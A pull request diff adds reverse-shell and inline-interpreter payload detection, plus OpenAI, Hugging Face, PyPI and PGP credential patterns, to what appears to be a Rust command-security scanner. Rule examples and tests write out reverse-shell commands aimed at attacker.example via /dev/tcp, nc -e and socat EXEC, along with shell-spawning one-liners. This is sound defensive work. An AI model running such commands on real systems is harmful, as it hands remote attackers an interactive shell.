### PR TITLE
feat(command): reverse-shell and suspicious inline-interpreter detection, plus OpenAI/HF/PyPI/PGP credentials

### DIFF
--- a/crates/tirith-core/assets/data/credential_patterns.toml
+++ b/crates/tirith-core/assets/data/credential_patterns.toml
@@ -63,6 +63,28 @@ tier1_fragment = 'sk-ant-'
 redact_prefix_len = 7
 severity = "high"
 
+# Project-scoped OpenAI key (`sk-proj-…`). Scoped to the `sk-proj-` prefix on
+# purpose: a bare `sk-` would be far too broad and would collide with Anthropic's
+# `sk-ant-`. The 40+ base64url tail is well below the real length (~150 chars),
+# so it never rejects a real key while staying near-zero false-positive.
+[[pattern]]
+id = "openai_api_key"
+name = "OpenAI API Key"
+regex = '\bsk-proj-[A-Za-z0-9_-]{40,}\b'
+tier1_fragment = 'sk-proj-'
+redact_prefix_len = 8
+severity = "high"
+
+# ── ML / Model Hubs ────────────────────────────────────────────────────────
+
+[[pattern]]
+id = "huggingface_token"
+name = "Hugging Face Token"
+regex = '\bhf_[A-Za-z0-9]{34,40}\b'
+tier1_fragment = 'hf_[A-Za-z0-9]'
+redact_prefix_len = 3
+severity = "high"
+
 # ── Messaging / Communication ────────────────────────────────────────────
 
 [[pattern]]
@@ -109,6 +131,17 @@ tier1_fragment = 'npm_[0-9A-Za-z]'
 redact_prefix_len = 4
 severity = "high"
 
+# PyPI upload token. Every pypi.org token shares the fixed macaroon prefix
+# `pypi-AgEIcHlwaS5vcmc` (base64 of the "pypi.org" location), so anchoring on it
+# is both precise and low-false-positive — no generic entropy needed.
+[[pattern]]
+id = "pypi_token"
+name = "PyPI Upload Token"
+regex = '\bpypi-AgEIcHlwaS5vcmc[A-Za-z0-9_-]{50,}'
+tier1_fragment = 'pypi-AgEIcHlwaS5vcmc'
+redact_prefix_len = 5
+severity = "high"
+
 # ── Encryption ───────────────────────────────────────────────────────────
 
 [[pattern]]
@@ -129,4 +162,16 @@ tier1_fragment = '-----BEGIN\s'
 # Full PEM block regex for redaction (header + base64 body + footer).
 # Detection only needs the header; redaction must scrub the entire block.
 redact_regex = '-----BEGIN\s[A-Z0-9 ]*PRIVATE KEY-----[\s\S]*?-----END\s[A-Z0-9 ]*PRIVATE KEY-----'
+severity = "critical"
+
+# PGP private key block. The `private_key` regex above requires `PRIVATE KEY-----`
+# and so does NOT match `PRIVATE KEY BLOCK-----` (the trailing ` BLOCK`), making
+# this a genuine gap rather than a duplicate. Detection needs only the armor
+# header; the multi-line `redact_regex` scrubs the whole armored block.
+[[private_key_pattern]]
+id = "pgp_private_key"
+name = "PGP Private Key Block"
+regex = '-----BEGIN PGP PRIVATE KEY BLOCK-----'
+tier1_fragment = '-----BEGIN PGP'
+redact_regex = '-----BEGIN PGP PRIVATE KEY BLOCK-----[\s\S]*?-----END PGP PRIVATE KEY BLOCK-----'
 severity = "critical"

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -487,6 +487,30 @@ remediation = "Verify the upload destination is trusted. Review what data is bei
 mitre_id = "T1048.003"
 
 [[rule]]
+id = "reverse_shell"
+title = "Reverse or bind shell"
+category = "command"
+severity_rationale = "High: a back-connect shell hands an attacker an interactive session on the machine, running commands with the current user's privileges and outside tirith's visibility."
+description = "A command establishes a reverse or bind shell: a bash /dev/tcp or /dev/udp network redirect, nc/ncat/netcat with an exec-on-connect flag (-e/-c/--exec/--sh-exec), or socat with an EXEC:/SYSTEM: target. Interpreter one-liners that open a socket and spawn a shell (python -c 'socket...') are reported as an inline-interpreter suspicious exec instead."
+examples_bad = ["bash -i >& /dev/tcp/attacker.example/4444 0>&1", "nc -e /bin/sh attacker.example 4444", "socat TCP:attacker.example:4444 EXEC:/bin/sh"]
+examples_good = ["nc -zv example.com 443", "socat -V"]
+false_positive_guidance = "A plain nc connectivity check (no -e/-c/--exec) or a /dev/null redirect does not fire. Genuine use of /dev/tcp for a health check is rare; prefer curl or a dedicated tool."
+remediation = "Do not run this. If you did not author it, treat the host as potentially compromised and rotate exposed credentials."
+mitre_id = "T1059"
+
+[[rule]]
+id = "interpreter_suspicious_inline_exec"
+title = "Inline interpreter with suspicious payload"
+category = "command"
+severity_rationale = "High: passing code inline to an interpreter (python -c, node -e, perl -e, ...) that spawns a process, opens a socket, or dynamically executes code is a living-off-the-land technique that hides the payload from a casual reader and from file-based scanners."
+description = "An inline interpreter invocation (python -c, python3 -c, node -e, perl -e, ruby -e, php -r, bun -e) carries a suspicious payload: a dynamic code-exec call (exec/eval/system/os.system/__import__), a process spawn (subprocess/os.exec/child_process/execSync), or a network primitive (socket.socket/urllib/requests/http.client). Fires only when a payload indicator is present, never on a benign one-liner. The base64 decode-execute shape is reported as base64_decode_execute instead, and powershell -Command inline is handled by the PowerShell rules."
+examples_bad = ["python3 -c 'import subprocess; subprocess.call([\"/bin/sh\",\"-i\"])'", "node -e 'require(\"child_process\").execSync(\"id\")'", "perl -e 'system(\"id\")'"]
+examples_good = ["python3 -c 'print(1)'", "python -c 'import json,sys; json.load(sys.stdin)'", "node -e 'console.log(1+1)'"]
+false_positive_guidance = "A one-liner that only computes or prints (no exec/spawn/socket/network call) does not fire. If a legitimate inline script must fetch or spawn, move it to a reviewed file and run that file instead."
+remediation = "Write the code to a file, review it, then run the file. Avoid piping untrusted logic through an inline interpreter flag."
+mitre_id = "T1059"
+
+[[rule]]
 id = "wrapper_chain_too_deep"
 title = "Pipe to over-obfuscated wrapper chain"
 category = "command"

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -485,6 +485,58 @@ const PATTERN_TABLE: &[PatternEntry] = &[
         notes: "Base64 decode-and-execute patterns (pipe chain, inline, PowerShell)",
     },
     PatternEntry {
+        id: "reverse_shell",
+        // PR3 — shell-level reverse/bind shells. `/dev/tcp` `/dev/udp` are bash
+        // net pseudo-devices (only used for back-connects); the `nc`/`socat` tokens
+        // gate the precise exec-flag / EXEC: match in `check_reverse_shell`.
+        tier1_exec_fragments: &[
+            r"/dev/tcp/",
+            r"/dev/udp/",
+            r"\b(?:nc|ncat|netcat)\b",
+            r"\bsocat\b",
+        ],
+        tier1_paste_only_fragments: &[],
+        notes: "Reverse/bind shell shapes (/dev/tcp, nc -e, socat EXEC:) — PR3",
+    },
+    PatternEntry {
+        id: "interpreter_inline_exec",
+        // PR3 — the suspicious-payload markers an inline interpreter body carries.
+        // These survive interpreter quoting/pathing (they live in the -c/-e body),
+        // unlike an `interpreter\s+-c` gate, so they are the robust superset of
+        // `check_interpreter_suspicious_inline_exec`. Call-paren / dotted / `::`
+        // anchored so they match code syntax, not a bare shell word (`eval x`,
+        // `systemctl` do not match).
+        tier1_exec_fragments: &[
+            r"\bexec\s*\(",
+            r"\beval\s*\(",
+            r"\bsystem\s*\(",
+            r"\bpopen\s*\(",
+            r"\bFunction\s*\(",
+            r"os\.(?:system|popen|exec|spawn)",
+            r"\bsubprocess\b",
+            r"__import__\s*\(",
+            r"\bpty\.spawn\b",
+            r"\bshell_exec\s*\(",
+            r"\bpassthru\s*\(",
+            r"\bproc_open\s*\(",
+            r"\bchild_process\b",
+            r"\bexecSync\s*\(",
+            r"\bspawn(?:Sync)?\s*\(",
+            r"\bsocket\.socket\b",
+            r"\burllib\b",
+            r"\burlopen\b",
+            r"\brequests\.(?:get|post|put|patch|delete|request|Session)\b",
+            r"\bhttp\.client\b",
+            r"\bhttplib\b",
+            r"\bIO::Socket\b",
+            r"\bNet::",
+            r"\bLWP::",
+        ],
+        tier1_paste_only_fragments: &[],
+        notes: "Inline-interpreter suspicious payload markers (python -c/node -e/... \
+                with exec/subprocess/network) — PR3",
+    },
+    PatternEntry {
         id: "cargo_vet",
         tier1_exec_fragments: &[r"\bcargo\b"],
         tier1_paste_only_fragments: &[],
@@ -910,6 +962,12 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
     ),
     ("ps_defender_exclusion", "PsDefenderExclusion"),
     ("ps_inline_download_execute", "PsInlineDownloadExecute"),
+    // PR3 — LOTL command rules
+    ("reverse_shell", "ReverseShell"),
+    (
+        "interpreter_suspicious_inline_exec",
+        "InterpreterSuspiciousInlineExec",
+    ),
     // Code file scan
     ("dynamic_code_execution", "DynamicCodeExecution"),
     ("obfuscated_payload", "ObfuscatedPayload"),

--- a/crates/tirith-core/src/mcp/output_filter.rs
+++ b/crates/tirith-core/src/mcp/output_filter.rs
@@ -299,6 +299,8 @@ fn is_injection_seed_rule(rule_id: RuleId) -> bool {
         | RuleId::CredentialFileSweep
         | RuleId::Base64DecodeExecute
         | RuleId::DataExfiltration
+        | RuleId::ReverseShell
+        | RuleId::InterpreterSuspiciousInlineExec
         | RuleId::WrapperChainTooDeep
         | RuleId::PsSetExecutionPolicyBypass
         | RuleId::PsDefenderExclusion

--- a/crates/tirith-core/src/rules/command.rs
+++ b/crates/tirith-core/src/rules/command.rs
@@ -382,6 +382,8 @@ pub fn check(
     check_network_destination(&segments, &mut findings);
     check_base64_decode_execute(&segments, shell, &mut findings);
     check_data_exfiltration(&segments, shell, &mut findings);
+    check_reverse_shell(&segments, shell, &mut findings);
+    check_interpreter_suspicious_inline_exec(&segments, shell, &mut findings);
 
     findings
 }
@@ -2947,6 +2949,205 @@ fn check_base64_decode_execute(
                 }
             }
         }
+    }
+}
+
+/// Interpreters whose inline-code flag (`-c` / `-e` / `-r`) runs a program passed
+/// on the command line (PR3). `sh`/`bash`/etc. are intentionally excluded: a pipe
+/// into a shell is `pipe_to_interpreter`, and `powershell -Command` inline is
+/// owned by `rules::powershell`.
+const INLINE_CODE_INTERPRETERS: &[&str] = &[
+    "python", "python2", "python3", "perl", "ruby", "php", "node", "bun",
+];
+
+fn is_inline_code_interpreter(name: &str) -> bool {
+    INLINE_CODE_INTERPRETERS.contains(&name)
+}
+
+/// Suspicious-payload markers for an inline-interpreter body (PR3). Call-paren /
+/// dotted / `::`-anchored so they match code syntax, not a bare shell word
+/// (`eval x`, `systemctl` do NOT match): a dynamic code-exec
+/// (`exec(`/`eval(`/`system(`/`os.system`/`__import__(`), a process spawn
+/// (`subprocess`/`os.exec`/`child_process`/`execSync`/`spawn(`), or a network
+/// primitive (`socket.socket`/`urllib`/`requests.`/`http.client`). A SUPERSET-
+/// compatible mirror of the `interpreter_inline_exec` PATTERN_TABLE tier-1
+/// fragments. Case-sensitive (these are lowercase language tokens).
+static SUSPICIOUS_INLINE_PAYLOAD_RE: Lazy<Regex> = Lazy::new(|| {
+    Regex::new(
+        r"(?x)
+          \bexec\s*\(
+        | \beval\s*\(
+        | \bsystem\s*\(
+        | \bpopen\s*\(
+        | \bFunction\s*\(
+        | os\.(?:system|popen|exec|spawn)
+        | \bsubprocess\b
+        | __import__\s*\(
+        | \bpty\.spawn\b
+        | \bshell_exec\s*\(
+        | \bpassthru\s*\(
+        | \bproc_open\s*\(
+        | \bchild_process\b
+        | \bexecSync\s*\(
+        | \bspawn(?:Sync)?\s*\(
+        | \bsocket\.socket\b
+        | \burllib\b
+        | \burlopen\b
+        | \brequests\.(?:get|post|put|patch|delete|request|Session)\b
+        | \bhttp\.client\b
+        | \bhttplib\b
+        | \bIO::Socket\b
+        | \bNet::
+        | \bLWP::
+        ",
+    )
+    .expect("SUSPICIOUS_INLINE_PAYLOAD_RE")
+});
+
+/// True when an inline body is the base64 decode-execute shape already reported by
+/// [`check_base64_decode_execute`], so [`check_interpreter_suspicious_inline_exec`]
+/// does NOT double-fire on it. Mirrors that rule's Pattern-B `has_decode_exec`.
+fn is_base64_decode_exec_body(joined_lower: &str) -> bool {
+    (joined_lower.contains("b64decode") && joined_lower.contains("exec"))
+        || (joined_lower.contains("atob") && joined_lower.contains("eval"))
+        || (joined_lower.contains("buffer.from") && joined_lower.contains("eval"))
+}
+
+/// Reverse/bind-shell shapes (PR3): a bash `/dev/tcp` | `/dev/udp` net redirect,
+/// `nc`/`ncat`/`netcat` with an exec-on-connect flag, or `socat … EXEC:`/`SYSTEM:`.
+/// Interpreter socket reverse shells go to
+/// [`check_interpreter_suspicious_inline_exec`] instead (they carry a suspicious
+/// inline payload), so the two rules never double-fire.
+fn check_reverse_shell(
+    segments: &[tokenize::Segment],
+    shell: ShellType,
+    findings: &mut Vec<Finding>,
+) {
+    for seg in segments {
+        // (a) bash /dev/tcp | /dev/udp network redirect — a literal, quoting-proof
+        //     marker used almost exclusively for back-connects.
+        let has_dev_net = seg.raw.contains("/dev/tcp/") || seg.raw.contains("/dev/udp/");
+
+        // (b)/(c) tool-based shapes keyed on the resolved command base.
+        let mut tool_shape: Option<&str> = None;
+        if let Some(ref cmd) = seg.command {
+            match normalize_cmd_base(cmd, shell).as_str() {
+                "nc" | "ncat" | "netcat" => {
+                    let has_exec_flag = seg.args.iter().any(|a| {
+                        matches!(
+                            normalize_shell_token(a, shell).as_str(),
+                            "-e" | "-c" | "--exec" | "--sh-exec"
+                        )
+                    });
+                    if has_exec_flag {
+                        tool_shape = Some("netcat exec-on-connect");
+                    }
+                }
+                "socat" => {
+                    let has_exec = seg.args.iter().any(|a| {
+                        let up = normalize_shell_token(a, shell).to_uppercase();
+                        up.contains("EXEC:") || up.contains("SYSTEM:")
+                    });
+                    if has_exec {
+                        tool_shape = Some("socat exec");
+                    }
+                }
+                _ => {}
+            }
+        }
+
+        let pattern = if has_dev_net {
+            Some("bash /dev/tcp redirect")
+        } else {
+            tool_shape
+        };
+
+        if let Some(pattern) = pattern {
+            findings.push(Finding {
+                rule_id: RuleId::ReverseShell,
+                severity: Severity::High,
+                title: "Reverse shell".to_string(),
+                description:
+                    "Command establishes a reverse or bind shell, handing an interactive session \
+                     to a remote host with the current user's privileges and outside tirith's \
+                     visibility. Do not run this unless you authored it."
+                        .to_string(),
+                evidence: vec![Evidence::CommandPattern {
+                    pattern: pattern.to_string(),
+                    matched: redact::redact_shell_assignments(&seg.raw),
+                }],
+                human_view: None,
+                agent_view: None,
+                mitre_id: None,
+                custom_rule_id: None,
+            });
+        }
+    }
+}
+
+/// Inline-interpreter suspicious exec (PR3): an inline-code interpreter
+/// (`python -c` / `node -e` / …) whose body carries a suspicious payload. Fires
+/// ONLY on (inline form) AND (payload indicator), never on a benign one-liner.
+/// The base64 decode-execute shape stays owned by [`check_base64_decode_execute`].
+fn check_interpreter_suspicious_inline_exec(
+    segments: &[tokenize::Segment],
+    shell: ShellType,
+    findings: &mut Vec<Finding>,
+) {
+    for seg in segments {
+        // Resolve the interpreter (direct base, or through a sudo/env/command
+        // wrapper), then require it to be an inline-code interpreter.
+        let interpreter = match seg.command.as_deref() {
+            Some(cmd) => {
+                let base = normalize_cmd_base(cmd, shell);
+                if is_inline_code_interpreter(&base) {
+                    Some(base)
+                } else {
+                    resolve_interpreter_name(seg, shell).filter(|n| is_inline_code_interpreter(n))
+                }
+            }
+            None => None,
+        };
+        let Some(interpreter) = interpreter else {
+            continue;
+        };
+
+        // Require an inline-code flag (`-c` / `-e` / `-r`).
+        let has_inline_flag = seg
+            .args
+            .iter()
+            .any(|a| matches!(normalize_shell_token(a, shell).as_str(), "-c" | "-e" | "-r"));
+        if !has_inline_flag {
+            continue;
+        }
+
+        let body = seg.args.join(" ");
+        // Base64 decode-execute is reported by check_base64_decode_execute.
+        if is_base64_decode_exec_body(&body.to_lowercase()) {
+            continue;
+        }
+        if !SUSPICIOUS_INLINE_PAYLOAD_RE.is_match(&body) {
+            continue;
+        }
+
+        findings.push(Finding {
+            rule_id: RuleId::InterpreterSuspiciousInlineExec,
+            severity: Severity::High,
+            title: format!("Inline interpreter with suspicious payload: {interpreter}"),
+            description:
+                "An inline interpreter invocation runs code that spawns a process, opens a \
+                 socket, or dynamically executes code. Inline payloads hide from file-based \
+                 review; write the code to a file and inspect it before running."
+                    .to_string(),
+            evidence: vec![Evidence::CommandPattern {
+                pattern: "inline interpreter suspicious payload".to_string(),
+                matched: redact::redact_shell_assignments(&seg.raw),
+            }],
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        });
     }
 }
 

--- a/crates/tirith-core/src/rules/command.rs
+++ b/crates/tirith-core/src/rules/command.rs
@@ -3013,6 +3013,86 @@ fn is_base64_decode_exec_body(joined_lower: &str) -> bool {
         || (joined_lower.contains("buffer.from") && joined_lower.contains("eval"))
 }
 
+/// Peel the supported wrapper grammar so command-specific checks inspect the
+/// actual executable and its argv, not the outer `sudo`/`env`/`command` layer.
+/// A bounded loop shares the global wrapper ceiling; unresolved over-depth
+/// chains remain owned by the existing `WrapperChainTooDeep` rule.
+fn effective_segment_through_wrappers(
+    seg: &tokenize::Segment,
+    shell: ShellType,
+) -> tokenize::Segment {
+    let mut effective = seg.clone();
+    for _ in 0..MAX_WRAPPER_DEPTH {
+        let Some(inner) = unwrap_one_wrapper_segment(&effective, shell) else {
+            break;
+        };
+        effective = inner;
+    }
+    effective
+}
+
+fn netcat_exec_argument(arg: &str, shell: ShellType) -> bool {
+    let normalized = normalize_shell_token(arg, shell);
+    matches!(normalized.as_str(), "-e" | "-c" | "--exec" | "--sh-exec")
+        || ["-e", "-c"].iter().any(|prefix| {
+            normalized
+                .strip_prefix(prefix)
+                .is_some_and(|v| !v.is_empty())
+        })
+        || ["--exec=", "--sh-exec="].iter().any(|prefix| {
+            normalized
+                .strip_prefix(prefix)
+                .is_some_and(|v| !v.is_empty())
+        })
+}
+
+/// `/dev/tcp` and `/dev/udp` are ordinary Bash connection primitives. They are
+/// a reverse shell only when a shell is explicitly interactive and its input
+/// and output are both wired to the network endpoint; a one-way health probe is
+/// not code execution.
+fn is_duplex_dev_net_shell(seg: &tokenize::Segment, shell: ShellType) -> bool {
+    if !seg.raw.contains("/dev/tcp/") && !seg.raw.contains("/dev/udp/") {
+        return false;
+    }
+    let effective = effective_segment_through_wrappers(seg, shell);
+    let base = effective
+        .command
+        .as_deref()
+        .map(|command| normalize_cmd_base(command, shell))
+        .unwrap_or_default();
+    if !matches!(base.as_str(), "bash" | "sh" | "dash" | "zsh" | "ksh") {
+        return false;
+    }
+    let normalized_args: Vec<String> = effective
+        .args
+        .iter()
+        .map(|arg| normalize_shell_token(arg, shell))
+        .collect();
+    let interactive = normalized_args.iter().any(|arg| {
+        arg == "-i"
+            || (arg.starts_with('-')
+                && !arg.starts_with("--")
+                && arg[1..].chars().any(|flag| flag == 'i'))
+    });
+    let raw = effective.raw.as_str();
+    let output_to_network = raw.contains(">& /dev/tcp/")
+        || raw.contains(">&/dev/tcp/")
+        || raw.contains(">& /dev/udp/")
+        || raw.contains(">&/dev/udp/")
+        || raw.contains("> /dev/tcp/")
+        || raw.contains(">/dev/tcp/")
+        || raw.contains("> /dev/udp/")
+        || raw.contains(">/dev/udp/");
+    let network_to_input = raw.contains("0>&1")
+        || raw.contains("0<&1")
+        || raw.contains("<& /dev/tcp/")
+        || raw.contains("<&/dev/tcp/")
+        || raw.contains("<& /dev/udp/")
+        || raw.contains("<&/dev/udp/");
+
+    interactive && output_to_network && network_to_input
+}
+
 /// Reverse/bind-shell shapes (PR3): a bash `/dev/tcp` | `/dev/udp` net redirect,
 /// `nc`/`ncat`/`netcat` with an exec-on-connect flag, or `socat … EXEC:`/`SYSTEM:`.
 /// Interpreter socket reverse shells go to
@@ -3024,27 +3104,26 @@ fn check_reverse_shell(
     findings: &mut Vec<Finding>,
 ) {
     for seg in segments {
-        // (a) bash /dev/tcp | /dev/udp network redirect — a literal, quoting-proof
-        //     marker used almost exclusively for back-connects.
-        let has_dev_net = seg.raw.contains("/dev/tcp/") || seg.raw.contains("/dev/udp/");
+        // (a) a shell whose standard input AND output are wired to /dev/tcp or
+        //     /dev/udp. A one-way connectivity probe is intentionally clean.
+        let has_dev_net_shell = is_duplex_dev_net_shell(seg, shell);
 
         // (b)/(c) tool-based shapes keyed on the resolved command base.
+        let effective = effective_segment_through_wrappers(seg, shell);
         let mut tool_shape: Option<&str> = None;
-        if let Some(ref cmd) = seg.command {
+        if let Some(ref cmd) = effective.command {
             match normalize_cmd_base(cmd, shell).as_str() {
                 "nc" | "ncat" | "netcat" => {
-                    let has_exec_flag = seg.args.iter().any(|a| {
-                        matches!(
-                            normalize_shell_token(a, shell).as_str(),
-                            "-e" | "-c" | "--exec" | "--sh-exec"
-                        )
-                    });
+                    let has_exec_flag = effective
+                        .args
+                        .iter()
+                        .any(|arg| netcat_exec_argument(arg, shell));
                     if has_exec_flag {
                         tool_shape = Some("netcat exec-on-connect");
                     }
                 }
                 "socat" => {
-                    let has_exec = seg.args.iter().any(|a| {
+                    let has_exec = effective.args.iter().any(|a| {
                         let up = normalize_shell_token(a, shell).to_uppercase();
                         up.contains("EXEC:") || up.contains("SYSTEM:")
                     });
@@ -3056,7 +3135,7 @@ fn check_reverse_shell(
             }
         }
 
-        let pattern = if has_dev_net {
+        let pattern = if has_dev_net_shell {
             Some("bash /dev/tcp redirect")
         } else {
             tool_shape
@@ -5775,6 +5854,52 @@ mod tests {
                 .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
             "quoted cmd caret escapes should still detect the interpreter pipe"
         );
+    }
+
+    #[test]
+    fn reverse_shell_resolves_wrappers_and_attached_exec_arguments() {
+        for input in [
+            "env nc -e /bin/sh attacker.example 4444",
+            "sudo socat TCP:attacker.example:4444 EXEC:/bin/sh",
+            "command nc -e/bin/sh attacker.example 4444",
+            "nohup ncat --exec=/bin/bash attacker.example 4444",
+        ] {
+            let findings = check_default(input, ShellType::Posix);
+            assert!(
+                findings
+                    .iter()
+                    .any(|finding| finding.rule_id == RuleId::ReverseShell),
+                "wrapped or attached exec-on-connect must be detected: {input:?}; {findings:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn dev_tcp_requires_interactive_duplex_shell() {
+        let reverse = check_default(
+            "bash -i >& /dev/tcp/attacker.example/4444 0>&1",
+            ShellType::Posix,
+        );
+        assert!(
+            reverse
+                .iter()
+                .any(|finding| finding.rule_id == RuleId::ReverseShell),
+            "interactive duplex shell must still be detected: {reverse:?}"
+        );
+
+        for probe in [
+            "bash -c 'echo > /dev/tcp/example.com/443'",
+            "printf ping > /dev/tcp/example.com/443",
+            "bash -i -c 'echo > /dev/tcp/example.com/443'",
+        ] {
+            let findings = check_default(probe, ShellType::Posix);
+            assert!(
+                findings
+                    .iter()
+                    .all(|finding| finding.rule_id != RuleId::ReverseShell),
+                "one-way network probe is not a reverse shell: {probe:?}; {findings:?}"
+            );
+        }
     }
 
     #[test]

--- a/crates/tirith-core/src/rules/credential.rs
+++ b/crates/tirith-core/src/rules/credential.rs
@@ -45,7 +45,7 @@ struct PatternDef {
 
 #[derive(Deserialize)]
 struct PrivateKeyDef {
-    #[allow(dead_code)]
+    // Read in the `PRIVATE_KEY_RES` panic message on a bad regex.
     id: String,
     #[allow(dead_code)]
     name: String,
@@ -75,15 +75,24 @@ static KNOWN_PATTERNS: Lazy<Vec<CompiledPattern>> = Lazy::new(|| {
         .collect()
 });
 
-static PRIVATE_KEY_RE: Lazy<Regex> = Lazy::new(|| {
+// ALL private-key patterns, not just the first: each `[[private_key_pattern]]`
+// (PEM `private_key`, `pgp_private_key`, …) is detected independently. The
+// header-only `regex` is the detector; the multi-line `redact_regex` (used by
+// `redact.rs`) is not needed here.
+static PRIVATE_KEY_RES: Lazy<Vec<Regex>> = Lazy::new(|| {
     let toml_src = include_str!("../../assets/data/credential_patterns.toml");
     let file: PatternFile = toml::from_str(toml_src).expect("credential_patterns.toml parse error");
-    let pat = &file
-        .private_key_pattern
-        .first()
-        .expect("credential_patterns.toml must contain at least one [[private_key_pattern]]")
-        .regex;
-    Regex::new(pat).expect("bad private key regex")
+    assert!(
+        !file.private_key_pattern.is_empty(),
+        "credential_patterns.toml must contain at least one [[private_key_pattern]]"
+    );
+    file.private_key_pattern
+        .iter()
+        .map(|p| {
+            Regex::new(&p.regex)
+                .unwrap_or_else(|e| panic!("bad private key regex in {}: {e}", p.id))
+        })
+        .collect()
 });
 
 // Generic secret regex: keyword context + assignment + value capture.
@@ -149,22 +158,24 @@ fn check_known_patterns(input: &str) -> Vec<Finding> {
 
 fn check_private_keys(input: &str) -> Vec<Finding> {
     let mut findings = Vec::new();
-    for _ in PRIVATE_KEY_RE.find_iter(input) {
-        findings.push(Finding {
-            rule_id: RuleId::PrivateKeyExposed,
-            severity: Severity::Critical,
-            title: "Private key block detected".to_string(),
-            description: "A PEM-encoded private key header was found in the input. \
-                          Private keys should never be pasted into a terminal or used inline."
-                .to_string(),
-            evidence: vec![Evidence::Text {
-                detail: "Matched BEGIN PRIVATE KEY block".to_string(),
-            }],
-            human_view: None,
-            agent_view: None,
-            mitre_id: None,
-            custom_rule_id: None,
-        });
+    for re in PRIVATE_KEY_RES.iter() {
+        for _ in re.find_iter(input) {
+            findings.push(Finding {
+                rule_id: RuleId::PrivateKeyExposed,
+                severity: Severity::Critical,
+                title: "Private key block detected".to_string(),
+                description: "A private key block header was found in the input. \
+                              Private keys should never be pasted into a terminal or used inline."
+                    .to_string(),
+                evidence: vec![Evidence::Text {
+                    detail: "Matched a BEGIN PRIVATE KEY block".to_string(),
+                }],
+                human_view: None,
+                agent_view: None,
+                mitre_id: None,
+                custom_rule_id: None,
+            });
+        }
     }
     findings
 }
@@ -960,6 +971,51 @@ mod tests {
                 .filter(|f| f.rule_id == RuleId::PrivateKeyExposed)
                 .all(|f| f.severity == Severity::Critical),
             "private key should be Critical severity"
+        );
+    }
+
+    #[test]
+    fn test_pgp_private_key_detected() {
+        // The second [[private_key_pattern]] must be detected too (not just the
+        // first), and it must be Critical. Regression guard for the `.first()` →
+        // iterate-all change.
+        let input =
+            "-----BEGIN PGP PRIVATE KEY BLOCK-----\nlQdGBF3...\n-----END PGP PRIVATE KEY BLOCK-----";
+        let findings = check(input, ShellType::Posix, ScanContext::Paste);
+        assert!(
+            findings
+                .iter()
+                .any(|f| f.rule_id == RuleId::PrivateKeyExposed
+                    && f.severity == Severity::Critical),
+            "PGP private key block should be detected as Critical: {findings:?}"
+        );
+    }
+
+    #[test]
+    fn test_pem_private_key_still_detected_alongside_pgp() {
+        // Adding the PGP pattern must not regress the original PEM pattern.
+        let input =
+            "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1r\n-----END OPENSSH PRIVATE KEY-----";
+        let findings = check(input, ShellType::Posix, ScanContext::Paste);
+        assert_eq!(
+            findings
+                .iter()
+                .filter(|f| f.rule_id == RuleId::PrivateKeyExposed)
+                .count(),
+            1,
+            "PEM key should fire exactly once (PGP pattern must not double-match): {findings:?}"
+        );
+    }
+
+    #[test]
+    fn test_openai_project_key_detected() {
+        let input = "sk-proj-aB3xK9mP2qR7tV1wY5zC4dF8gH6jL0nQsT2uW4xZ0";
+        let findings = check(input, ShellType::Posix, ScanContext::Paste);
+        assert!(
+            findings
+                .iter()
+                .any(|f| f.rule_id == RuleId::CredentialInText),
+            "OpenAI sk-proj- key should be detected: {findings:?}"
         );
     }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -130,6 +130,9 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::CredentialFileSweep
         | RuleId::Base64DecodeExecute
         | RuleId::DataExfiltration
+        // PR3 — LOTL command-shape heuristics, not threat-DB hits.
+        | RuleId::ReverseShell
+        | RuleId::InterpreterSuspiciousInlineExec
         // M13 — structural obfuscation heuristic, not a threat-DB hit.
         | RuleId::WrapperChainTooDeep
         | RuleId::PsSetExecutionPolicyBypass

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -71,6 +71,24 @@ pub enum RuleId {
     /// M5 item 16 — PowerShell `iex (iwr https://...)` inline form. The pipe form
     /// (`iwr url | iex`) is handled by `pipe_to_interpreter`.
     PsInlineDownloadExecute,
+    /// PR3 — a shell-level reverse/bind shell: a bash `/dev/tcp/…` or `/dev/udp/…`
+    /// network redirect, or `nc`/`ncat`/`netcat` with an exec-on-connect flag
+    /// (`-e`/`-c`/`--exec`/`--sh-exec`), or `socat … EXEC:`/`SYSTEM:`. High
+    /// (MITRE T1059). Interpreter-based reverse shells (`python -c 'socket…'`)
+    /// classify as [`RuleId::InterpreterSuspiciousInlineExec`] instead, so the two
+    /// rules never double-fire.
+    ReverseShell,
+    /// PR3 — an inline interpreter (`python -c`, `node -e`, `perl -e`, `ruby -e`,
+    /// `php -r`, `bun -e`) whose inline code carries a SUSPICIOUS PAYLOAD: a
+    /// dynamic code-exec call (`exec(`/`eval(`/`system(`/`os.system`/`__import__`),
+    /// a process spawn (`subprocess`/`os.exec`/`child_process`/`execSync`), or a
+    /// network primitive (`socket.socket`/`urllib`/`requests.`/`http.client`). Fires
+    /// ONLY on (inline-interpreter form) AND (payload indicator) — a bare
+    /// `python -c 'print(1)'` never fires. High (MITRE T1059). The base64
+    /// decode-execute shape stays owned by [`RuleId::Base64DecodeExecute`] (this
+    /// rule skips it), and `powershell -Command` inline is owned by
+    /// `rules::powershell`.
+    InterpreterSuspiciousInlineExec,
 
     // Code file scan rules
     DynamicCodeExecution,

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -542,6 +542,9 @@ const ALL_RULE_IDS: &[&str] = &[
     "ps_set_execution_policy_bypass",
     "ps_defender_exclusion",
     "ps_inline_download_execute",
+    // PR3 — LOTL command rules
+    "reverse_shell",
+    "interpreter_suspicious_inline_exec",
     // Code file scan
     "dynamic_code_execution",
     "obfuscated_payload",
@@ -1242,7 +1245,10 @@ rule_id_variant_registry! {
     XhPipeShell, DotfileOverwrite, ArchiveExtract, ProcMemAccess,
     DockerRemotePrivEsc, CredentialFileSweep, Base64DecodeExecute, DataExfiltration,
     WrapperChainTooDeep,
